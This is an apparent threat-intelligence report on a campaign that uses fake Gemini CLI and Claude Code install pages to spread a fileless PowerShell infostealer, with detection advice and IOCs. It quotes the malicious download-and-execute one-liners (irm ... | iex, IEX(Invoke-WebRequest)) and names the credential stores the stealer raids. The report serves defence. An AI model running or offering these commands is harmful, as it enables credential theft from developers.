SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer

Executive summary

• Financially motivated eCrime actors will likely continue to expand opportunistic campaigns by impersonating AI platforms. These campaigns generate direct supply chain risk for enterprises, as threat actors target software developer tooling, including AI coding assistants and package managers, to compromise developer workstations.
• In early March 2026, EclecticIQ analysts identified an ongoing infostealer campaign targeting Gemini CLI and Claude Code users. Threat actors use SEO poisoning to surface fake domains above legitimate results, directing victims to attacker-controlled infrastructure that mimics genuine AI agent installation pages.
• The infostealer targets Windows endpoints and executes entirely in memory through PowerShell, harvesting credentials and sensitive data from a wide range of applications before exfiltrating the results in encrypted form to a command-and-control server.
• Beyond credential theft, the malware provides arbitrary remote code execution capability, which financially motivated operators leverage to transition into hands-on-keyboard intrusions against selected victims and execute interactive code within the compromised environment.
• Installations from these impersonated websites result in exfiltration of OAuth tokens, CI/CD credentials, corporate VPN details, and sensitive files, giving adversaries a direct path to initial access into the wider enterprise network.
• This campaign showing that, financially motivated threat actors are capitalizing on widespread enterprise adoption of AI platforms to deliver infostealer malware.
• Despite sustained law enforcement action, including Operation Magnus against RedLine and META in October 2024 and the May 2025 disruption of LummaC2 infrastructure, infostealer deployment against enterprise targets will likely continue to grow in the near term. Low operating costs and persistent demand for stolen credentials in underground markets sustain this trajectory.

Typosquatted domains impersonate Gemini and Claude Code installation

The Gemini CLI impersonation campaign was first publicly identified by independent threat researcher @g0njxa [1], whose initial discovery enabled analysis and infrastructure pivoting documented in this report. The infection chain begins with a Google search by a developer looking for the official Gemini CLI [2] or Claude Code [3] installation page. Threat actors use SEO poisoning to surface a fake domain at the top of search results, above the legitimate source. The victim clicks through, lands on a malicious page visually consistent with a genuine vendor installation guide and is prompted to execute a single command to complete the install.

Figure 1 - Impersonation of Gemini CLI installation page.

In Gemini CLI impersonation campaign, victims were directed to fake installation page geminicli[.]co[.]com, which displays what appears to be a legitimate installation instruction. The page prompts the user to copy and paste a PowerShell command into their terminal but when executed, the command reaches out to gemini-setup[.]com to download the infostealer downloader payload (Install.ps1).

Figure 2 - Malicious instruction used to deliver infostealer downloader.

Once downloading is finished infostealer establishes a connection to command-and-control server hosted at events[.]msft23[.]com, it’s an infrastructure used to receive exfiltrated data from compromised hosts.

Figure 3 - C2 communication after the execution of the infostealer.

The same threat actor also, almost certainly, targeted users of Anthropic's Claude Code. This assessment is based on use of same malware family, structure of the command-and-control server and consistency in social engineering lure.

On March 30, 2026, threat actor registered two additional domains for Claude code impersonation, which were claudecode[.]co[.]com and claude-setup[.]com, both leveraging the identical naming patterns with the co[.]com suffix and the -setup[.]com convention. Threat actor used this domain name selection to appear legitimate against the victim users. Malicious domain claudecode[.]co[.]com was hosting a cloned installation page visually consistent with Anthropic's official documentation and presents the user with a PowerShell command to "install" the tool, while claude-setup[.]com hosts the final payload that was downloaded.

Figure 4 - Similarities of domain names between two AI platform impersonation campaigns.

After the execution, the infostealer malware sends exfiltrated data to events[.]ms709[.]com, which serves as the C2 server for Claude Code impersonation campaign. The attack chain mirrors behavior observed in the Gemini impersonation campaign, including the use of identical themed domain conventions to stage and deliver payloads. This behavioral overlap increases analyst confidence in the assessment that the same threat actor is responsible for both campaigns.

Weaponizing legitimate AI tooling installations to hide a fileless PowerShell infostealer

Malware analysis reveals the infection chain begins with a short first-stage PowerShell script embedded in the fake installation page, which performs two simultaneous actions rather than executing the payload directly:

Figure 5 - Downloader PowerShell script.

• Silent payload retrieval: The script instantiates a Shell.Application COM object and calls ShellExecute with window style 0 (hidden) to spawn a concealed PowerShell window. This hidden process executes irm events[.]msft23[.]com | iex command that is used to downloading the second-stage infostealer payload directly into memory via Invoke-RestMethod and passing it to Invoke-Expression for immediate execution without writing to disk.
• Legitimate Gemini installation: In parallel, the same script runs npm install -g @google/gemini-cli command, installing the genuine Gemini CLI package from Google's official npm registry. The victim sees a real installation complete successfully in their terminal, dependency resolution, progress bars, and a working CLI binary at the end.

The real CLI completes while the stealer runs in parallel, appearing genuine to the user. By the time the npm install finishes and the user begins working with the tool, the infostealer has already completed its data collection and exfiltration cycle.

Once the second stage PowerShell payload is executed, it immediately moves to neutralize Microsoft Windows endpoint visibility by disabling two core defensive mechanisms:

Figure 6 - Final PowerShell infostealer disabling ETW.

• Event Tracing for Windows (ETW): The script patches the PSEtwLogProvider.m_enabled flag, suppressing PowerShell-specific ETW telemetry and preventing both local logging and forwarded event collection from capturing execution details.
• Antimalware Scan Interface (AMSI): The bypass renders in-process script scanning inoperative, allowing subsequent obfuscated content to execute without triggering signature-based or heuristic detections.

After Microsoft Defender's telemetry collection is neutralized, the script operates in an effectively unmonitored environment. The malicious PowerShell script performs all of the collection, staging and exfiltration natively. It is heavily obfuscated with approximately 6,800 lines of junk code branches and includes a qemu-ga string check as a basic anti-sandbox gate designed to detect virtualized environments before proceeding.

To interact with the operating system at a level beyond what PowerShell cmdlets expose, the script loads three embedded C# types at runtime via Add-Type, each targeting a different aspect of host interrogation:

• CredHelper: P/Invokes advapi32.dll to call CredEnumerate [4] against Windows Credential Manager, extracting stored credentials for web services, RDP sessions, and enterprise applications.
• User32: Calls EnumDisplaySettings to capture screen resolution, a common fingerprinting technique used to profile the victim environment and identify virtual machines.
• Rstrtmgr: Leverages the Restart Manager API through rstrtmgr.dll to enumerate running processes without calling the heavily monitored Get-Process cmdlet, providing the operator with an immediate view of active security tooling and productivity applications on the host.

The stealer's collection scope reveals a deliberate focus on enterprise users and developer workstations. It iterates across all detected browser profiles, invoking dedicated routines for Chromium-family browsers, Chrome, Edge, and Brave and a separate handler for Firefox, extracting login credentials, session cookies, autofill data, and form history. Beyond browsers, the script directly targets collaboration and communication platforms that are standard in corporate environments:

• Slack: Local State key extraction and Network cookies
• Microsoft Teams: EBWebView cache cookies under LocalAppData, with DPAPI-protected Local State decryption
• Discord: Local Storage LevelDB files and Local State
• Mattermost: Session cookies and Local State
• Zoom: DPAPI-protected win_osencrypt_key extracted from Zoom.us.ini
• Telegram Desktop: tdata session directory
• LiveChat, Notion, Zoho Mail Desktop: Session cookies and partitioned storage data

For an attacker, a valid session cookie or Local State key from any of these platforms grants authenticated access to the victim's workspace, including internal channels, shared files, client communications, and connected integrations. This access bypasses password and MFA requirements entirely, making stolen session material a high-value commodity for immediate resale in underground markets. This is the data that feeds the access broker market and enables account takeover at scale.

Collection extends further into access tokens, cloud storage and sensitive user files. The script targets:

• Remote access tools: WinSCP stored passwords from the registry (HKCU:\SOFTWARE\Martin Prikryl\WinSCP 2\), PuTTY saved sessions (HKCU:\Software\SimonTatham\PuTTY\Sessions), and OpenVPN configuration files including embedded key material and DPAPI-protected login data.
• Cryptocurrency wallets: Brave Wallet preferences and Spectre wallet data.
• Cloud storage: Enumeration of locally synced directories for Proton Drive, iCloud Drive, Google Drive, MEGA, and OneDrive.
• User files and system metadata: Recursive listing of .txt and .docx files across Desktop, Documents, and Downloads; desktop wallpaper capture via TranscodedWallpaper; OS version, installed software, network adapter configuration, and running process inventory.

Data exfiltration from SSH keys and VPN configurations to cloud-synced documents, ensures that even a single compromised workstation yields credentials, session tokens, and files spanning both personal and corporate contexts. A full breakdown of all targeted software and data types is provided in Table 1, Software and Data Targeted by the Infostealer.

The infostealer sample also includes a command-and-control feature that allows the operator to run arbitrary follow-on payloads on infected hosts. But no persistence method is found in the PowerShell script.

Figure 7 – De-obfuscated C2 server and staging URL paths embedded in the PowerShell script.

The infostealer communicates with events.msft23[.]com over three URL endpoints:

• /take is used to request initial configuration or staging data from the server.
• /process is the main beacon endpoint that both uploads exfiltrated host data and returns the operator's task list in the same HTTP response.
• /validate is used to confirm task execution or report status back to the operator.

The task dispatch flow works as follows:

• After exfiltrating data to events.msft23[.]com/process, the same request returns an RSA-encrypted task list in the response.
• The implant decrypts it, splits it into records, and matches each record's target ID against the local victim ID (derived from MachineGuid).
• On a match, it runs the operator-supplied URL via powershell.exe -command IEX(Invoke-WebRequest -UseBasicParsing '<url>') through Shell.Application.ShellExecute.
• A secondary path uses named pipes to run arbitrary PowerShell in a child process and capture its output back to the parent.

Mapping the wider campaign through passive DNS pivots from a single bulletproof host

EclecticIQ analysts used passive DNS records and pivoted from the claude-code.co[.]com domain, which is hosted at 109.107.170[.]111, an IP address assigned to the Netherlands-based bulletproof hosting provider MIRhosting [5]. This pivot revealed larger cluster of malicious infrastructure with more than 30 domains, exposing a highly likely coordinated campaign also designed to impersonate package manager Node.js and Chocolatey, open-source password manager KeePassXC, cryptocurrency Monero and other developer productivity tooling.

Figure 8 - Pivoted domains from AI impersonation campaign.

This impersonation campaign is likely geographically tailored to mostly target users in the United States and United Kingdom, as evidenced by the selection of .co.uk, .us.com and .us.org top-level domains in some of the attacker-controlled domains.

The inclusion of Monero lures indicates a multi-faceted objective, combining crypto theft with the compromise of developer environments. The rapid registration of these domains between late March and early April 2026 suggests highly likely an active campaign.

One example from this pivoted cluster is nodejs-setup.co[.]com, a domain impersonating the official Node.js installation page. Rather than delivering a legitimate Node.js installer, the page instructs the visitor to execute the following PowerShell command:

• "powershell.exe" -c "irm https://community.chocolatey.net/install.ps1|iex"

Figure 9 - Impersonation of Node.js package manager.

The lure using a fake Node.js installation page, deliberately invoking Chocolatey as the installation method which is a calculated choice, as legitimate Node.js installations genuinely support Chocolatey-based setup. The one-liner PowerShell script references community.chocolatey[.]net, a domain impersonating Chocolatey's official infrastructure, stacking two spoofed domains into a single, social-engineering flow that closely mirrors authentic developer workflows.

The technique is tailored to the habits of developers and IT administrators, who routinely paste one-line PowerShell installers from package manager websites without close inspection. The execution chain ultimately delivers the same fileless PowerShell infostealer documented earlier in this report, with the only meaningful change being a rotation of the command-and-control endpoint from events.msft23[.]com to events.ms709[.]com.

Both C2 domains follow the same structural pattern, an "events." subdomain paired with a short, brand-adjacent root that loosely evokes Microsoft, indicating that the operator is reusing a single tooling and infrastructure template and rotating only the lure brand and C2 hostname while keeping the underlying implant and naming logic intact.

Across this campaign, the threat actor shows an understanding of developer behavior and exploits the current hype of AI coding platforms. These attack patterns are highly likely targets the developers and IT administrators. By impersonating brands embedded in routine developer workflows, including Node.js, Chocolatey, and KeePassXC, the actor weaponized familiar installation patterns to deliver infostealer malware. This approach target trust in developer tooling, turning routine software adoption into an initial access vector.

This targeting approach will very likely persist and expand over the coming months, as developers typically hold elevated privileges across enterprise networks, source code repositories, and software supply chains. Financially motivated eCrime actors will highly likely continue prioritizing developer-focused campaigns, as a single compromised developer endpoint can yield disproportionate access and enable high-impact intrusions against the wider enterprise environment.

Detection and prevention opportunities

Detection opportunities

• Hunt for the irm | iex download cradle pattern in command-line telemetry. Process command lines containing Invoke-RestMethod, Invoke-Expression, or the aliases irm and iex chained together are a high-fidelity indicator of fileless execution.
• Alert on powershell.exe spawned with -WindowStyle Hidden or instantiated through Shell.Application.ShellExecute with window style 0. This is the concealed execution pattern used in the first-stage script.
• Hunt for Add-Type followed by P/Invoke calls to advapi32.dll!CredEnumerate from a PowerShell session. This is the credential-manager dumping behavior of the stealer.

• Block or alert on traffic to .co.com second-level domains, particularly when the FQDN mirrors a developer brand (e.g., *-setup.com, *-cli.co.com, nodejs-*, claude-*, gemini-*).
• Detect the C2 beacon pattern: HTTP requests to URI paths /take, /process, /validate with PowerShell user-agent strings.

• Correlate powershell.exe spawning from explorer.exe or cmd.exe with outbound HTTP/HTTPS connections within five seconds. This catches paste-and-execute initial access.

Prevention opportunities

• Enforce PowerShell Constrained Language Mode (CLM) on standard developer workstations via WDAC or AppLocker. This blocks Add-Type, reflection, and most P/Invoke-based credential theft used by the stealer.
• Use FIDO keys to minimize identity based attack chains that are targeting high privileged user accounts.
• Deploy AppLocker or WDAC rules that prevent powershell.exe from executing scripts downloaded from the internet (Mark-of-the-Web enforcement).
• Configure browser policies to disable clipboard write access for untrusted sites where feasible, mitigating ClickFix-style paste-and-execute lures.

• Enforce short-lived OAuth tokens with mandatory refresh and conditional access on developer-tier accounts to limit replay value of stolen session cookies.

• Create user awareness for developer-specific guidance about this social engineering campaign.

IOCs

Attacker controlled domains:

api[.]bio9438[.]com
claudecode-install[.]co[.]com
openclow[.]co[.]com
geninicli[.]co[.]com
keepassxc[.]us[.]org
claude-code[.]co[.]com
chocolatey[.]net
claudecode[.]co[.]com
chocolatey-setup[.]co[.]com
get-monero[.]co[.]uk
getmonero[.]us[.]com
metrics[.]msft17[.]com
claude-setup[.]com
keepassxc[.]us[.]com
olive3451[.]com
events[.]ms709[.]com
chocolatey-download[.]co[.]com
chocolatey[.]co[.]com

SHA 256 file hash:

• ff81cb9263fcde5870a0748fd6af2d30a4ba864415c15ca14827d0dd723eb60c
• 9c87e8162b39fbb773c416006b16f8e34aca53372d1b2d4a584df0ffc69ad333
• 89d634c8471382ff9c6fd966008ad5c376d7a0edae8f799eb569837170f2373d
• be2ff065a232a3a6f187f9fb03a6c1b368dff3d2ba0966777b1f5503aa5ecd16
• a1c5e1d9bdc1a931c11ac6fdfdff1fbc69ff88521cf443cb174f9720a05fe72d
• bb78f024c4d8b5a6a128aacb498acad025a234a6b25fde36ff2e14601134555f
• a6525b37b0cc5339df375e17a0c10772b50c9d425001b0c3a9dada995c7f62dd
• b37ee243518221017bab0eb4b54b5431571cc21e54113698ce49a89b89993754
• aa350580ae5ea46544ffa15c324ab4225dff0dcc5842ac5ca8e2dc4018e5ffad
• 65e1a542bb7d995cc4aa6c71191da125f14f99ca03da7266f5b071440d6d229a
• 64d2a9a49e27d89f1b3489d7db29c3a3a12b4b090f59c24b694c239cb55db262
• 2d7a94e4a0fedcf31cdd43b06222add9d1888fecb2c5488afc658d08c3f40116
• 5c6a2c73f59fd8defbf118f87e5c88ba62e3067f8e8c0ed104f3f188fa0d959d
• de34f2f93b74e049a08074c779a863a87a85a403594b8e220b1fba15112e6386
• 0e8c45d847f57095d9879c0da764ab02431db4d5d85f50c4fd5ba38353b79eed
• dfd21a363f4994794f821d76ca61c834882a51b5c6f7b95627b70789462149e3
• a31ae1eef3261c36b465255e624fb7ac5899bf2a9823564ba792fac8346723aa
• 1439d30ebeac3a6ccb9545acaa350783a83cc08746cb575e59ddb0efc77d412a
• 7c2a9ad5fcf489d1844f51830242f6dd9dfc203be6de3ceb07a4f6dd21c9f1a3
• 80ffc86673bd8c8bd5862bbe961323a822b23c94df48c685162c571445552faa
• c416052c8ac6bfb78b7f0c46c568c528ead33501149661f1d9ecb1861269f8fa
• efbf87447d93f4232b1169920f75c2066d19863ebc28fb2d2662353dc4ef61d8
• 2d9ecc9321994558d0cc0e9d3fa9fdf600bacfe8758976d34f26f89c33bd5007
• ae9bc11adb457930d402844bd3bf3af8ea7c13fdb7ea269fbe73877b18af1ca8
• c213ce07b5791abd334ff749b5f05ecc6b40772d35ef4388b5f576bc3e619765
• 27e17661f5573f63b65e3a5cfe5bdca75acdc1911441b032781f7ebe125d9194
• ae8f70dad97fedecd707977ca22fd6f656c64c0dac96e03f0f4a6c04d0693f59
• c47610c9df3fb101b0e99f2ac12589db653464edf12cebaa2c67fd33fc7715f3
• 5071921cb1ca369fe8f7af522a00373c8c85e4357f7ea1879d2cb4ae791797d6

Table 1 - software and data targeted by the infostealer

MITRE ATT&CK mapping

References

[1] Who said what? [@g0njxa], “Related Windows malware campaign new deployments impersonating Google’s Gemini CLI tool 🤖👾 Detonation: https://t.co/n8h0LUViks geminicli[.]co[.]com >> gemini-setup[.]com Prompting user to execute a malicious Powershell script hosted at the fake gemini website https://t.co/AmqIQm4VOS,” Twitter. Accessed: Apr. 28, 2026. [Online]. Available: https://x.com/g0njxa/status/2046605636494885329

[2] “Build, debug & deploy with AI,” Gemini CLI. Accessed: Apr. 28, 2026. [Online]. Available: https://geminicli.com/

[3] “Claude Code | Anthropic’s agentic coding system.” Accessed: Apr. 28, 2026. [Online]. Available: https://www.anthropic.com/product/claude-code

[4] “pinvoke.net: credwrite (advapi32).” Accessed: Apr. 28, 2026. [Online]. Available: https://www.pinvoke.net/default.aspx/advapi32.credwrite

[5] “Bulletproof Host Stark Industries Evades EU Sanctions – Krebs on Security.” Accessed: Apr. 28, 2026. [Online]. Available: https://krebsonsecurity.com/2025/09/bulletproof-host-stark-industries-evades-eu-sanctions/